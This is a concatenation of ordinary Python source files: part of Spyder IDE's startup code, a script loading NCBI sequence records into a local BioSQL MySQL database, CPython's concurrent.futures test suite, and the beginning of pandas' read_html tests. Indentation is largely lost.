if force or (should_show_tour and not running_under_pytest()
and not get_safe_mode()):
CONF.set('main', 'show_tour_message', False)
self.tour_dialog = tour.OpenTourDialog(
self, lambda: self.show_tour(DEFAULT_TOUR))
self.tour_dialog.show()
# --- For OpenGL
def _test_setting_opengl(self, option):
"""Get the current OpenGL implementation in use"""
if option == 'software':
return QCoreApplication.testAttribute(Qt.AA_UseSoftwareOpenGL)
elif option == 'desktop':
return QCoreApplication.testAttribute(Qt.AA_UseDesktopOpenGL)
elif option == 'gles':
return QCoreApplication.testAttribute(Qt.AA_UseOpenGLES)
#==============================================================================
# Utilities for the 'main' function below
#==============================================================================
def create_application():
"""Create application and patch sys.exit."""
# Our QApplication
app = qapplication()
# --- Set application icon
app_icon = QIcon(get_image_path("spyder"))
app.setWindowIcon(app_icon)
# Required for correct icon on GNOME/Wayland:
if hasattr(app, 'setDesktopFileName'):
app.setDesktopFileName('spyder')
#----Monkey patching QApplication
class FakeQApplication(QApplication):
"""Spyder's fake QApplication"""
def __init__(self, args):
self = app # analysis:ignore
@staticmethod
def exec_():
"""Do nothing because the Qt mainloop is already running"""
pass
from qtpy import QtWidgets
QtWidgets.QApplication = FakeQApplication
# ----Monkey patching sys.exit
    def fake_sys_exit(arg=None):
pass
sys.exit = fake_sys_exit
# ----Monkey patching sys.excepthook to avoid crashes in PyQt 5.5+
if PYQT5:
def spy_excepthook(type_, value, tback):
sys.__excepthook__(type_, value, tback)
sys.excepthook = spy_excepthook
# Removing arguments from sys.argv as in standard Python interpreter
sys.argv = ['']
return app
def create_window(app, splash, options, args):
"""
Create and show Spyder's main window and start QApplication event loop.
"""
# Main window
main = MainWindow(splash, options)
try:
main.setup()
except BaseException:
if main.console is not None:
try:
main.console.exit_interpreter()
except BaseException:
pass
raise
main.show()
main.post_visible_setup()
if main.console:
namespace = CONF.get('internal_console', 'namespace', {})
main.console.start_interpreter(namespace)
main.console.set_namespace_item('spy', Spy(app=app, window=main))
# Propagate current configurations to all configuration observers
CONF.notify_all_observers()
# Don't show icons in menus for Mac
if sys.platform == 'darwin':
QCoreApplication.setAttribute(Qt.AA_DontShowIconsInMenus, True)
# Open external files with our Mac app
if running_in_mac_app():
app.sig_open_external_file.connect(main.open_external_file)
app._has_started = True
if hasattr(app, '_pending_file_open'):
if args:
args = app._pending_file_open + args
else:
args = app._pending_file_open
# Open external files passed as args
if args:
for a in args:
main.open_external_file(a)
# To give focus again to the last focused widget after restoring
# the window
app.focusChanged.connect(main.change_last_focused_widget)
if not running_under_pytest():
app.exec_()
return main
#==============================================================================
# Main
#==============================================================================
def main(options, args):
"""Main function"""
# **** For Pytest ****
if running_under_pytest():
if CONF.get('main', 'opengl') != 'automatic':
option = CONF.get('main', 'opengl')
set_opengl_implementation(option)
app = create_application()
window = create_window(app, None, options, None)
return window
# **** Handle hide_console option ****
if options.show_console:
print("(Deprecated) --show console does nothing, now the default "
" behavior is to show the console, use --hide-console if you "
"want to hide it")
if set_attached_console_visible is not None:
set_attached_console_visible(not options.hide_console
or options.reset_config_files
or options.reset_to_defaults
or options.optimize
or bool(get_debug_level()))
# **** Set OpenGL implementation to use ****
# This attribute must be set before creating the application.
# See spyder-ide/spyder#11227
if options.opengl_implementation:
option = options.opengl_implementation
set_opengl_implementation(option)
else:
if CONF.get('main', 'opengl') != 'automatic':
option = CONF.get('main', 'opengl')
set_opengl_implementation(option)
# **** Set high DPI scaling ****
# This attribute must be set before creating the application.
if hasattr(Qt, 'AA_EnableHighDpiScaling'):
QCoreApplication.setAttribute(Qt.AA_EnableHighDpiScaling,
CONF.get('main', 'high_dpi_scaling'))
# **** Set debugging info ****
setup_logging(options)
# **** Create the application ****
app = create_application()
# **** Create splash screen ****
splash = create_splash_screen()
if splash is not None:
splash.show()
splash.showMessage(
_("Initializing..."),
int(Qt.AlignBottom | Qt.AlignCenter | Qt.AlignAbsolute),
QColor(Qt.white)
)
QApplication.processEvents()
if options.reset_to_defaults:
# Reset Spyder settings to defaults
CONF.reset_to_defaults()
return
elif options.optimize:
# Optimize the whole Spyder's source code directory
import spyder
programs.run_python_script(module="compileall",
args=[spyder.__path__[0]], p_args=['-O'])
return
# **** Read faulthandler log file ****
faulthandler_file = get_conf_path('faulthandler.log')
previous_crash = ''
if osp.exists(faulthandler_file):
with open(faulthandler_file, 'r') as f:
previous_crash = f.read()
# Remove file to not pick it up for next time.
try:
dst = get_conf_path('faulthandler.log.old')
shutil.move(faulthandler_file, dst)
except Exception:
pass
CONF.set('main', 'previous_crash', previous_crash)
# **** Create main window ****
mainwindow = None
try:
if PY3 and options.report_segfault:
import faulthandler
with open(faulthandler_file, 'w') as f:
faulthandler.enable(file=f)
mainwindow = create_window(app, splash, options, args)
else:
mainwindow = create_window(app, splash, options, args)
except FontError:
QMessageBox.information(None, "Spyder",
"Spyder was unable to load the <i>Spyder 3</i> "
"icon theme. That's why it's going to fallback to the "
"theme used in Spyder 2.<br><br>"
"For that, please close this window and start Spyder again.")
CONF.set('appearance', 'icon_theme', 'spyder 2')
if mainwindow is None:
# An exception occurred
if splash is not None:
splash.hide()
return
ORIGINAL_SYS_EXIT()
if __name__ == "__main__":
main()
|
02-import-sequences.py
|
from tqdm import tqdm
import traceback
from SNDG.Comparative.Pangenome import Pangenome, Strain, sqldb
from SNDG.WebServices.NCBI import NCBI
from Bio import Entrez, SeqIO
import multiprocessing
from BioSQL import BioSeqDatabase
server = BioSeqDatabase.open_database(driver="MySQLdb", user="root",
passwd="mito", host="localhost", db="bioseqdb")
def save_sequences(strain):
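    # Fetch every nuccore record of the strain's assembly from NCBI and load
    # it into the strain's BioSQL sub-database.
    # NOTE: this relies on the module-level `server` and on `pbar2`/`genome`
    # from the __main__ loop below; they are only available in the worker
    # process when multiprocessing uses fork (the default on Linux).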
db = server[strain.acc]
sequencesList = Entrez.read(Entrez.esearch(
db="nuccore", term=strain.acc + "[Assembly]", idtype="acc", retmax=100000))["IdList"]
n = 150
list_of_lists = [sequencesList[i:i+n] for i in range(0, len(sequencesList), n)]
def seq_iterator():
for seq_ids in list_of_lists:
handle = Entrez.efetch(db="nuccore", id=",".join(seq_ids), rettype="gb", retmode="text")
for seq in SeqIO.parse(handle, "genbank"):
yield seq
pbar2.set_description(genome.name)
with tqdm(seq_iterator(), total=len(sequencesList)) as pbar3:
pbar3.set_description("loading sequences")
db.load(pbar3)
server.commit()
if __name__ == '__main__':
from peewee import MySQLDatabase
mysql_db = MySQLDatabase('bioseqdb', user="root", password="mito")
sqldb.initialize(mysql_db)
tables = [Pangenome,Strain]
# for x in tables:
# x.create_table()
Entrez.email = "Your.Name.Here@example.org"
genomes = list(Pangenome.select())
with tqdm(genomes) as pbar1:
for genome in pbar1:
pbar1.set_description(genome.name)
strains = list(Strain.select().where(Strain.pangenome == genome))
with tqdm(strains) as pbar2:
for strain in pbar2:
try:
if strain.acc not in server:
db = server.new_database(strain.acc, description="")
server.commit()
def save_strain():
save_sequences(strain)
p = multiprocessing.Process(target=save_strain)
p.start()
p.join(180)
if p.is_alive():
p.terminate()
p.join()
raise multiprocessing.TimeoutError()
strain.loaded = True
strain.save()
except Exception as ex:
traceback.print_exc()
server.rollback()
if strain.acc in server:
server.remove_database(strain.acc)
server.commit()
|
test_concurrent_futures.py
|
import test.support
# Skip tests if _multiprocessing wasn't built.
test.support.import_module('_multiprocessing')
# Skip tests if sem_open implementation is broken.
test.support.import_module('multiprocessing.synchronize')
# import threading after _multiprocessing to raise a more relevant error
# message: "No module named _multiprocessing". _multiprocessing is not compiled
# without thread support.
test.support.import_module('threading')
from test.support.script_helper import assert_python_ok
import os
import sys
import threading
import time
import unittest
import weakref
from concurrent import futures
from concurrent.futures._base import (
PENDING, RUNNING, CANCELLED, CANCELLED_AND_NOTIFIED, FINISHED, Future)
from concurrent.futures.process import BrokenProcessPool
def create_future(state=PENDING, exception=None, result=None):
f = Future()
f._state = state
f._exception = exception
f._result = result
return f
PENDING_FUTURE = create_future(state=PENDING)
RUNNING_FUTURE = create_future(state=RUNNING)
CANCELLED_FUTURE = create_future(state=CANCELLED)
CANCELLED_AND_NOTIFIED_FUTURE = create_future(state=CANCELLED_AND_NOTIFIED)
EXCEPTION_FUTURE = create_future(state=FINISHED, exception=OSError())
SUCCESSFUL_FUTURE = create_future(state=FINISHED, result=42)
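# Sentinel futures covering the different lifecycle states, reused by the
# tests below.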
def mul(x, y):
return x * y
def sleep_and_raise(t):
time.sleep(t)
raise Exception('this is an exception')
def sleep_and_print(t, msg):
time.sleep(t)
print(msg)
sys.stdout.flush()
class MyObject(object):
def my_method(self):
pass
class ExecutorMixin:
worker_count = 5
def setUp(self):
self.t1 = time.time()
try:
self.executor = self.executor_type(max_workers=self.worker_count)
except NotImplementedError as e:
self.skipTest(str(e))
self._prime_executor()
def tearDown(self):
self.executor.shutdown(wait=True)
dt = time.time() - self.t1
if test.support.verbose:
print("%.2fs" % dt, end=' ')
self.assertLess(dt, 60, "synchronization issue: test lasted too long")
def _prime_executor(self):
# Make sure that the executor is ready to do work before running the
# tests. This should reduce the probability of timeouts in the tests.
futures = [self.executor.submit(time.sleep, 0.1)
for _ in range(self.worker_count)]
for f in futures:
f.result()
class ThreadPoolMixin(ExecutorMixin):
executor_type = futures.ThreadPoolExecutor
class ProcessPoolMixin(ExecutorMixin):
executor_type = futures.ProcessPoolExecutor
class ExecutorShutdownTest:
def test_run_after_shutdown(self):
self.executor.shutdown()
self.assertRaises(RuntimeError,
self.executor.submit,
pow, 2, 5)
def test_interpreter_shutdown(self):
# Test the atexit hook for shutdown of worker threads and processes
rc, out, err = assert_python_ok('-c', """if 1:
from concurrent.futures import {executor_type}
from time import sleep
from test.test_concurrent_futures import sleep_and_print
t = {executor_type}(5)
t.submit(sleep_and_print, 1.0, "apple")
""".format(executor_type=self.executor_type.__name__))
        # Errors in atexit hooks don't change the process exit code; check
        # stderr manually.
self.assertFalse(err)
self.assertEqual(out.strip(), b"apple")
def test_hang_issue12364(self):
fs = [self.executor.submit(time.sleep, 0.1) for _ in range(50)]
self.executor.shutdown()
for f in fs:
f.result()
class ThreadPoolShutdownTest(ThreadPoolMixin, ExecutorShutdownTest, unittest.TestCase):
def _prime_executor(self):
pass
def test_threads_terminate(self):
self.executor.submit(mul, 21, 2)
self.executor.submit(mul, 6, 7)
self.executor.submit(mul, 3, 14)
self.assertEqual(len(self.executor._threads), 3)
self.executor.shutdown()
for t in self.executor._threads:
t.join()
def test_context_manager_shutdown(self):
with futures.ThreadPoolExecutor(max_workers=5) as e:
executor = e
self.assertEqual(list(e.map(abs, range(-5, 5))),
[5, 4, 3, 2, 1, 0, 1, 2, 3, 4])
for t in executor._threads:
t.join()
def test_del_shutdown(self):
executor = futures.ThreadPoolExecutor(max_workers=5)
executor.map(abs, range(-5, 5))
threads = executor._threads
del executor
for t in threads:
t.join()
def test_thread_names_assigned(self):
executor = futures.ThreadPoolExecutor(
max_workers=5, thread_name_prefix='SpecialPool')
executor.map(abs, range(-5, 5))
threads = executor._threads
del executor
for t in threads:
self.assertRegex(t.name, r'^SpecialPool_[0-4]$')
t.join()
def test_thread_names_default(self):
executor = futures.ThreadPoolExecutor(max_workers=5)
executor.map(abs, range(-5, 5))
threads = executor._threads
del executor
for t in threads:
# Ensure that our default name is reasonably sane and unique when
# no thread_name_prefix was supplied.
self.assertRegex(t.name, r'ThreadPoolExecutor-\d+_[0-4]$')
t.join()
class ProcessPoolShutdownTest(ProcessPoolMixin, ExecutorShutdownTest, unittest.TestCase):
def _prime_executor(self):
pass
def test_processes_terminate(self):
self.executor.submit(mul, 21, 2)
self.executor.submit(mul, 6, 7)
self.executor.submit(mul, 3, 14)
self.assertEqual(len(self.executor._processes), 5)
processes = self.executor._processes
self.executor.shutdown()
for p in processes.values():
p.join()
def test_context_manager_shutdown(self):
with futures.ProcessPoolExecutor(max_workers=5) as e:
processes = e._processes
self.assertEqual(list(e.map(abs, range(-5, 5))),
[5, 4, 3, 2, 1, 0, 1, 2, 3, 4])
for p in processes.values():
p.join()
def test_del_shutdown(self):
executor = futures.ProcessPoolExecutor(max_workers=5)
list(executor.map(abs, range(-5, 5)))
queue_management_thread = executor._queue_management_thread
processes = executor._processes
del executor
queue_management_thread.join()
for p in processes.values():
p.join()
class WaitTests:
def test_first_completed(self):
future1 = self.executor.submit(mul, 21, 2)
future2 = self.executor.submit(time.sleep, 1.5)
done, not_done = futures.wait(
[CANCELLED_FUTURE, future1, future2],
return_when=futures.FIRST_COMPLETED)
self.assertEqual(set([future1]), done)
self.assertEqual(set([CANCELLED_FUTURE, future2]), not_done)
def test_first_completed_some_already_completed(self):
future1 = self.executor.submit(time.sleep, 1.5)
finished, pending = futures.wait(
[CANCELLED_AND_NOTIFIED_FUTURE, SUCCESSFUL_FUTURE, future1],
return_when=futures.FIRST_COMPLETED)
self.assertEqual(
set([CANCELLED_AND_NOTIFIED_FUTURE, SUCCESSFUL_FUTURE]),
finished)
self.assertEqual(set([future1]), pending)
def test_first_exception(self):
future1 = self.executor.submit(mul, 2, 21)
future2 = self.executor.submit(sleep_and_raise, 1.5)
future3 = self.executor.submit(time.sleep, 3)
finished, pending = futures.wait(
[future1, future2, future3],
return_when=futures.FIRST_EXCEPTION)
self.assertEqual(set([future1, future2]), finished)
self.assertEqual(set([future3]), pending)
def test_first_exception_some_already_complete(self):
future1 = self.executor.submit(divmod, 21, 0)
future2 = self.executor.submit(time.sleep, 1.5)
finished, pending = futures.wait(
[SUCCESSFUL_FUTURE,
CANCELLED_FUTURE,
CANCELLED_AND_NOTIFIED_FUTURE,
future1, future2],
return_when=futures.FIRST_EXCEPTION)
self.assertEqual(set([SUCCESSFUL_FUTURE,
CANCELLED_AND_NOTIFIED_FUTURE,
future1]), finished)
self.assertEqual(set([CANCELLED_FUTURE, future2]), pending)
def test_first_exception_one_already_failed(self):
future1 = self.executor.submit(time.sleep, 2)
finished, pending = futures.wait(
[EXCEPTION_FUTURE, future1],
return_when=futures.FIRST_EXCEPTION)
self.assertEqual(set([EXCEPTION_FUTURE]), finished)
self.assertEqual(set([future1]), pending)
def test_all_completed(self):
future1 = self.executor.submit(divmod, 2, 0)
future2 = self.executor.submit(mul, 2, 21)
finished, pending = futures.wait(
[SUCCESSFUL_FUTURE,
CANCELLED_AND_NOTIFIED_FUTURE,
EXCEPTION_FUTURE,
future1,
future2],
return_when=futures.ALL_COMPLETED)
self.assertEqual(set([SUCCESSFUL_FUTURE,
CANCELLED_AND_NOTIFIED_FUTURE,
EXCEPTION_FUTURE,
future1,
future2]), finished)
self.assertEqual(set(), pending)
def test_timeout(self):
future1 = self.executor.submit(mul, 6, 7)
future2 = self.executor.submit(time.sleep, 6)
finished, pending = futures.wait(
[CANCELLED_AND_NOTIFIED_FUTURE,
EXCEPTION_FUTURE,
SUCCESSFUL_FUTURE,
future1, future2],
timeout=5,
return_when=futures.ALL_COMPLETED)
self.assertEqual(set([CANCELLED_AND_NOTIFIED_FUTURE,
EXCEPTION_FUTURE,
SUCCESSFUL_FUTURE,
future1]), finished)
self.assertEqual(set([future2]), pending)
class ThreadPoolWaitTests(ThreadPoolMixin, WaitTests, unittest.TestCase):
def test_pending_calls_race(self):
# Issue #14406: multi-threaded race condition when waiting on all
# futures.
event = threading.Event()
def future_func():
event.wait()
oldswitchinterval = sys.getswitchinterval()
sys.setswitchinterval(1e-6)
try:
fs = {self.executor.submit(future_func) for i in range(100)}
event.set()
futures.wait(fs, return_when=futures.ALL_COMPLETED)
finally:
sys.setswitchinterval(oldswitchinterval)
class ProcessPoolWaitTests(ProcessPoolMixin, WaitTests, unittest.TestCase):
pass
class AsCompletedTests:
# TODO(brian@sweetapp.com): Should have a test with a non-zero timeout.
def test_no_timeout(self):
future1 = self.executor.submit(mul, 2, 21)
future2 = self.executor.submit(mul, 7, 6)
completed = set(futures.as_completed(
[CANCELLED_AND_NOTIFIED_FUTURE,
EXCEPTION_FUTURE,
SUCCESSFUL_FUTURE,
future1, future2]))
self.assertEqual(set(
[CANCELLED_AND_NOTIFIED_FUTURE,
EXCEPTION_FUTURE,
SUCCESSFUL_FUTURE,
future1, future2]),
completed)
def test_zero_timeout(self):
future1 = self.executor.submit(time.sleep, 2)
completed_futures = set()
try:
for future in futures.as_completed(
[CANCELLED_AND_NOTIFIED_FUTURE,
EXCEPTION_FUTURE,
SUCCESSFUL_FUTURE,
future1],
timeout=0):
completed_futures.add(future)
except futures.TimeoutError:
pass
self.assertEqual(set([CANCELLED_AND_NOTIFIED_FUTURE,
EXCEPTION_FUTURE,
SUCCESSFUL_FUTURE]),
completed_futures)
def test_duplicate_futures(self):
# Issue 20367. Duplicate futures should not raise exceptions or give
# duplicate responses.
future1 = self.executor.submit(time.sleep, 2)
completed = [f for f in futures.as_completed([future1,future1])]
self.assertEqual(len(completed), 1)
class ThreadPoolAsCompletedTests(ThreadPoolMixin, AsCompletedTests, unittest.TestCase):
pass
class ProcessPoolAsCompletedTests(ProcessPoolMixin, AsCompletedTests, unittest.TestCase):
pass
class ExecutorTest:
# Executor.shutdown() and context manager usage is tested by
# ExecutorShutdownTest.
def test_submit(self):
future = self.executor.submit(pow, 2, 8)
self.assertEqual(256, future.result())
def test_submit_keyword(self):
future = self.executor.submit(mul, 2, y=8)
self.assertEqual(16, future.result())
def test_map(self):
self.assertEqual(
list(self.executor.map(pow, range(10), range(10))),
list(map(pow, range(10), range(10))))
def test_map_exception(self):
i = self.executor.map(divmod, [1, 1, 1, 1], [2, 3, 0, 5])
self.assertEqual(i.__next__(), (0, 1))
self.assertEqual(i.__next__(), (0, 1))
self.assertRaises(ZeroDivisionError, i.__next__)
def test_map_timeout(self):
results = []
try:
for i in self.executor.map(time.sleep,
[0, 0, 6],
timeout=5):
results.append(i)
except futures.TimeoutError:
pass
else:
self.fail('expected TimeoutError')
self.assertEqual([None, None], results)
def test_shutdown_race_issue12456(self):
# Issue #12456: race condition at shutdown where trying to post a
# sentinel in the call queue blocks (the queue is full while processes
# have exited).
self.executor.map(str, [2] * (self.worker_count + 1))
self.executor.shutdown()
@test.support.cpython_only
def test_no_stale_references(self):
# Issue #16284: check that the executors don't unnecessarily hang onto
# references.
my_object = MyObject()
my_object_collected = threading.Event()
my_object_callback = weakref.ref(
my_object, lambda obj: my_object_collected.set())
# Deliberately discarding the future.
self.executor.submit(my_object.my_method)
del my_object
collected = my_object_collected.wait(timeout=5.0)
self.assertTrue(collected,
"Stale reference not collected within timeout.")
def test_max_workers_negative(self):
for number in (0, -1):
with self.assertRaisesRegex(ValueError,
"max_workers must be greater "
"than 0"):
self.executor_type(max_workers=number)
class ThreadPoolExecutorTest(ThreadPoolMixin, ExecutorTest, unittest.TestCase):
def test_map_submits_without_iteration(self):
"""Tests verifying issue 11777."""
finished = []
def record_finished(n):
finished.append(n)
self.executor.map(record_finished, range(10))
self.executor.shutdown(wait=True)
self.assertCountEqual(finished, range(10))
def test_default_workers(self):
executor = self.executor_type()
self.assertEqual(executor._max_workers,
(os.cpu_count() or 1) * 5)
class ProcessPoolExecutorTest(ProcessPoolMixin, ExecutorTest, unittest.TestCase):
def test_killed_child(self):
# When a child process is abruptly terminated, the whole pool gets
# "broken".
futures = [self.executor.submit(time.sleep, 3)]
# Get one of the processes, and terminate (kill) it
p = next(iter(self.executor._processes.values()))
p.terminate()
for fut in futures:
self.assertRaises(BrokenProcessPool, fut.result)
# Submitting other jobs fails as well.
self.assertRaises(BrokenProcessPool, self.executor.submit, pow, 2, 8)
def test_map_chunksize(self):
def bad_map():
list(self.executor.map(pow, range(40), range(40), chunksize=-1))
ref = list(map(pow, range(40), range(40)))
self.assertEqual(
list(self.executor.map(pow, range(40), range(40), chunksize=6)),
ref)
self.assertEqual(
list(self.executor.map(pow, range(40), range(40), chunksize=50)),
ref)
self.assertEqual(
list(self.executor.map(pow, range(40), range(40), chunksize=40)),
ref)
self.assertRaises(ValueError, bad_map)
@classmethod
def _test_traceback(cls):
raise RuntimeError(123) # some comment
def test_traceback(self):
        # We want to ensure that the traceback from the child process is
        # contained in the traceback raised in the main process.
future = self.executor.submit(self._test_traceback)
with self.assertRaises(Exception) as cm:
future.result()
exc = cm.exception
self.assertIs(type(exc), RuntimeError)
self.assertEqual(exc.args, (123,))
cause = exc.__cause__
self.assertIs(type(cause), futures.process._RemoteTraceback)
self.assertIn('raise RuntimeError(123) # some comment', cause.tb)
with test.support.captured_stderr() as f1:
try:
raise exc
except RuntimeError:
sys.excepthook(*sys.exc_info())
self.assertIn('raise RuntimeError(123) # some comment',
f1.getvalue())
class FutureTests(unittest.TestCase):
def test_done_callback_with_result(self):
callback_result = None
def fn(callback_future):
nonlocal callback_result
callback_result = callback_future.result()
f = Future()
f.add_done_callback(fn)
f.set_result(5)
self.assertEqual(5, callback_result)
def test_done_callback_with_exception(self):
callback_exception = None
def fn(callback_future):
nonlocal callback_exception
callback_exception = callback_future.exception()
f = Future()
f.add_done_callback(fn)
f.set_exception(Exception('test'))
self.assertEqual(('test',), callback_exception.args)
def test_done_callback_with_cancel(self):
was_cancelled = None
def fn(callback_future):
nonlocal was_cancelled
was_cancelled = callback_future.cancelled()
f = Future()
f.add_done_callback(fn)
self.assertTrue(f.cancel())
self.assertTrue(was_cancelled)
def test_done_callback_raises(self):
with test.support.captured_stderr() as stderr:
raising_was_called = False
fn_was_called = False
def raising_fn(callback_future):
nonlocal raising_was_called
raising_was_called = True
raise Exception('doh!')
def fn(callback_future):
nonlocal fn_was_called
fn_was_called = True
f = Future()
f.add_done_callback(raising_fn)
f.add_done_callback(fn)
f.set_result(5)
self.assertTrue(raising_was_called)
self.assertTrue(fn_was_called)
self.assertIn('Exception: doh!', stderr.getvalue())
def test_done_callback_already_successful(self):
callback_result = None
def fn(callback_future):
nonlocal callback_result
callback_result = callback_future.result()
f = Future()
f.set_result(5)
f.add_done_callback(fn)
self.assertEqual(5, callback_result)
def test_done_callback_already_failed(self):
callback_exception = None
def fn(callback_future):
nonlocal callback_exception
callback_exception = callback_future.exception()
f = Future()
f.set_exception(Exception('test'))
f.add_done_callback(fn)
self.assertEqual(('test',), callback_exception.args)
def test_done_callback_already_cancelled(self):
was_cancelled = None
def fn(callback_future):
nonlocal was_cancelled
was_cancelled = callback_future.cancelled()
f = Future()
self.assertTrue(f.cancel())
f.add_done_callback(fn)
self.assertTrue(was_cancelled)
def test_repr(self):
self.assertRegex(repr(PENDING_FUTURE),
'<Future at 0x[0-9a-f]+ state=pending>')
self.assertRegex(repr(RUNNING_FUTURE),
'<Future at 0x[0-9a-f]+ state=running>')
self.assertRegex(repr(CANCELLED_FUTURE),
'<Future at 0x[0-9a-f]+ state=cancelled>')
self.assertRegex(repr(CANCELLED_AND_NOTIFIED_FUTURE),
'<Future at 0x[0-9a-f]+ state=cancelled>')
self.assertRegex(
repr(EXCEPTION_FUTURE),
'<Future at 0x[0-9a-f]+ state=finished raised OSError>')
self.assertRegex(
repr(SUCCESSFUL_FUTURE),
'<Future at 0x[0-9a-f]+ state=finished returned int>')
def test_cancel(self):
f1 = create_future(state=PENDING)
f2 = create_future(state=RUNNING)
f3 = create_future(state=CANCELLED)
f4 = create_future(state=CANCELLED_AND_NOTIFIED)
f5 = create_future(state=FINISHED, exception=OSError())
f6 = create_future(state=FINISHED, result=5)
self.assertTrue(f1.cancel())
self.assertEqual(f1._state, CANCELLED)
self.assertFalse(f2.cancel())
self.assertEqual(f2._state, RUNNING)
self.assertTrue(f3.cancel())
self.assertEqual(f3._state, CANCELLED)
self.assertTrue(f4.cancel())
self.assertEqual(f4._state, CANCELLED_AND_NOTIFIED)
self.assertFalse(f5.cancel())
self.assertEqual(f5._state, FINISHED)
self.assertFalse(f6.cancel())
self.assertEqual(f6._state, FINISHED)
def test_cancelled(self):
self.assertFalse(PENDING_FUTURE.cancelled())
self.assertFalse(RUNNING_FUTURE.cancelled())
self.assertTrue(CANCELLED_FUTURE.cancelled())
self.assertTrue(CANCELLED_AND_NOTIFIED_FUTURE.cancelled())
self.assertFalse(EXCEPTION_FUTURE.cancelled())
self.assertFalse(SUCCESSFUL_FUTURE.cancelled())
def test_done(self):
self.assertFalse(PENDING_FUTURE.done())
self.assertFalse(RUNNING_FUTURE.done())
self.assertTrue(CANCELLED_FUTURE.done())
self.assertTrue(CANCELLED_AND_NOTIFIED_FUTURE.done())
self.assertTrue(EXCEPTION_FUTURE.done())
self.assertTrue(SUCCESSFUL_FUTURE.done())
def test_running(self):
self.assertFalse(PENDING_FUTURE.running())
self.assertTrue(RUNNING_FUTURE.running())
self.assertFalse(CANCELLED_FUTURE.running())
self.assertFalse(CANCELLED_AND_NOTIFIED_FUTURE.running())
self.assertFalse(EXCEPTION_FUTURE.running())
self.assertFalse(SUCCESSFUL_FUTURE.running())
def test_result_with_timeout(self):
self.assertRaises(futures.TimeoutError,
PENDING_FUTURE.result, timeout=0)
self.assertRaises(futures.TimeoutError,
RUNNING_FUTURE.result, timeout=0)
self.assertRaises(futures.CancelledError,
CANCELLED_FUTURE.result, timeout=0)
self.assertRaises(futures.CancelledError,
CANCELLED_AND_NOTIFIED_FUTURE.result, timeout=0)
self.assertRaises(OSError, EXCEPTION_FUTURE.result, timeout=0)
self.assertEqual(SUCCESSFUL_FUTURE.result(timeout=0), 42)
def test_result_with_success(self):
# TODO(brian@sweetapp.com): This test is timing dependent.
def notification():
# Wait until the main thread is waiting for the result.
time.sleep(1)
f1.set_result(42)
f1 = create_future(state=PENDING)
t = threading.Thread(target=notification)
t.start()
self.assertEqual(f1.result(timeout=5), 42)
def test_result_with_cancel(self):
# TODO(brian@sweetapp.com): This test is timing dependent.
def notification():
# Wait until the main thread is waiting for the result.
time.sleep(1)
f1.cancel()
f1 = create_future(state=PENDING)
t = threading.Thread(target=notification)
t.start()
self.assertRaises(futures.CancelledError, f1.result, timeout=5)
def test_exception_with_timeout(self):
self.assertRaises(futures.TimeoutError,
PENDING_FUTURE.exception, timeout=0)
self.assertRaises(futures.TimeoutError,
RUNNING_FUTURE.exception, timeout=0)
self.assertRaises(futures.CancelledError,
CANCELLED_FUTURE.exception, timeout=0)
self.assertRaises(futures.CancelledError,
CANCELLED_AND_NOTIFIED_FUTURE.exception, timeout=0)
self.assertTrue(isinstance(EXCEPTION_FUTURE.exception(timeout=0),
OSError))
self.assertEqual(SUCCESSFUL_FUTURE.exception(timeout=0), None)
def test_exception_with_success(self):
def notification():
# Wait until the main thread is waiting for the exception.
time.sleep(1)
with f1._condition:
f1._state = FINISHED
f1._exception = OSError()
f1._condition.notify_all()
f1 = create_future(state=PENDING)
t = threading.Thread(target=notification)
t.start()
self.assertTrue(isinstance(f1.exception(timeout=5), OSError))
@test.support.reap_threads
def test_main():
try:
test.support.run_unittest(__name__)
finally:
test.support.reap_children()
if __name__ == "__main__":
test_main()
|
test_html.py
|
from functools import partial
from importlib import reload
from io import BytesIO, StringIO
import os
import re
import threading
import numpy as np
from numpy.random import rand
import pytest
from pandas.compat import is_platform_windows
from pandas.errors import ParserError
import pandas.util._test_decorators as td
from pandas import (
DataFrame, Index, MultiIndex, Series, Timestamp, date_range, read_csv)
import pandas.util.testing as tm
from pandas.util.testing import makeCustomDataframe as mkdf, network
from pandas.io.common import URLError, file_path_to_url
import pandas.io.html
from pandas.io.html import read_html
HERE = os.path.dirname(__file__)
@pytest.fixture(params=[
'chinese_utf-16.html',
'chinese_utf-32.html',
'chinese_utf-8.html',
'letz_latin1.html',
])
def html_encoding_file(request, datapath):
"""Parametrized fixture for HTML encoding test filenames."""
return datapath('io', 'data', 'html_encoding', request.param)
def assert_framelist_equal(list1, list2, *args, **kwargs):
assert len(list1) == len(list2), ('lists are not of equal size '
'len(list1) == {0}, '
'len(list2) == {1}'.format(len(list1),
len(list2)))
msg = 'not all list elements are DataFrames'
both_frames = all(map(lambda x, y: isinstance(x, DataFrame) and
isinstance(y, DataFrame), list1, list2))
assert both_frames, msg
for frame_i, frame_j in zip(list1, list2):
tm.assert_frame_equal(frame_i, frame_j, *args, **kwargs)
assert not frame_i.empty, 'frames are both empty'
@td.skip_if_no('bs4')
def test_bs4_version_fails(monkeypatch, datapath):
import bs4
monkeypatch.setattr(bs4, '__version__', '4.2')
with pytest.raises(ValueError, match="minimum version"):
read_html(datapath("io", "data", "spam.html"), flavor='bs4')
def test_invalid_flavor():
url = "google.com"
flavor = "invalid flavor"
msg = r"\{" + flavor + r"\} is not a valid set of flavors"
with pytest.raises(ValueError, match=msg):
read_html(url, "google", flavor=flavor)
@td.skip_if_no('bs4')
@td.skip_if_no('lxml')
def test_same_ordering(datapath):
filename = datapath('io', 'data', 'valid_markup.html')
dfs_lxml = read_html(filename, index_col=0, flavor=['lxml'])
dfs_bs4 = read_html(filename, index_col=0, flavor=['bs4'])
assert_framelist_equal(dfs_lxml, dfs_bs4)
@pytest.mark.parametrize("flavor", [
    pytest.param('bs4', marks=pytest.mark.skipif(
        not td.safe_import('bs4'), reason='No bs4')),
pytest.param('lxml', marks=pytest.mark.skipif(
not td.safe_import('lxml'), reason='No lxml'))], scope="class")
class TestReadHtml:
@pytest.fixture(autouse=True)
def set_files(self, datapath):
self.spam_data = datapath('io', 'data', 'spam.html')
self.spam_data_kwargs = {}
self.spam_data_kwargs['encoding'] = 'UTF-8'
self.banklist_data = datapath("io", "data", "banklist.html")
@pytest.fixture(autouse=True, scope="function")
def set_defaults(self, flavor, request):
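        # `flavor` comes from the class-level parametrize above, so every
        # test in this class runs once per parser (bs4 and lxml).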
self.read_html = partial(read_html, flavor=flavor)
yield
def test_to_html_compat(self):
df = mkdf(4, 3, data_gen_f=lambda *args: rand(), c_idx_names=False,
r_idx_names=False).applymap('{0:.3f}'.format).astype(float)
out = df.to_html()
res = self.read_html(out, attrs={'class': 'dataframe'}, index_col=0)[0]
